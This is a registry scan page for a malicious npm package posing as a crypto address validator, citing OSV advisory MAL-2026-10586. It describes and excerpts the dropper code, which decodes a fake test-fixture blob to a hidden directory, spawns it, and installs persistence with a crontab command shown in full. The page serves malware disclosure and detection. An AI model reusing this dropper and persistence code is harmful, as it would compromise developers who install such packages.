registry  /  crypto-validate-lib  /  1.0.1

crypto-validate-lib@1.0.1

Cross-chain cryptocurrency address validator — validates Bitcoin, Ethereum, Solana, BSC, TRON, Cardano, and more

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10586 confirms this npm version as malicious. index.js contains a self-invoking IIFE that, 37 seconds after the module is required, reads a base64 blob from test/fixtures/keypairs.dat (a ~53KB opaque file masquerading as test data), decodes it to ~40KB of JavaScript, writes the result to ~/.cache-db/.node-sync/syncd.js with mode 0o700, and spawns it via a detached node child process...

Advisory
MAL-2026-10586
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in crypto-validate-lib (npm)
Details
index.js contains a self-invoking IIFE that, 37 seconds after the module is required, reads a base64 blob from test/fixtures/keypairs.dat (a ~53KB opaque file masquerading as test data), decodes it to ~40KB of JavaScript, writes the result to ~/.cache-db/.node-sync/syncd.js with mode 0o700, and spawns it via a detached node child process. Persistence is installed alongside the drop: on Linux a crontab entry is appended running the dropped script every 12 hours, and on Windows a scheduled task named 'WinNodeSync' is created to run it hourly (mod 12). The hidden dot-directory name and the scheduled-task name masquerade as benign Node caching. The package is advertised as a crypto address validator; decoding a bundled opaque blob, writing it to a hidden home-directory path, installing cron/schtasks persistence, and background-executing it has no relationship to that purpose.
Decision reason
No blocking static signals were detected.; source fingerprint signature matched known malicious package; routed for review

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessFilesystemShell
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 2.94 KB of source

Source & flagged code

2 flagged · loading source
index.jsView file
matchType = malicious_source_fingerprint_signature signature = 77bc3928f6793798 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = crypto-validate-lib@1.0.0 matchedPath = index.js matchedIdentity = npm:Y3J5cHRvLXZhbGlkYXRlLWxpYg:1.0.0 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
52var o = require("os"); L53: var c = require("child_process"); L54: var h = o.homedir(); L55: var d = p.join(h, ".cache-db", ".node-sync"); ... L61: var b64 = f.readFileSync(src, "utf8").trim(); L62: f.writeFileSync(s, Buffer.from(b64, "base64").toString("utf8"), { mode: 0o700 }); L63: try { L64: if (process.platform === "linux") { L65: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L66: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L52

Findings

1 High1 Medium1 Low
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem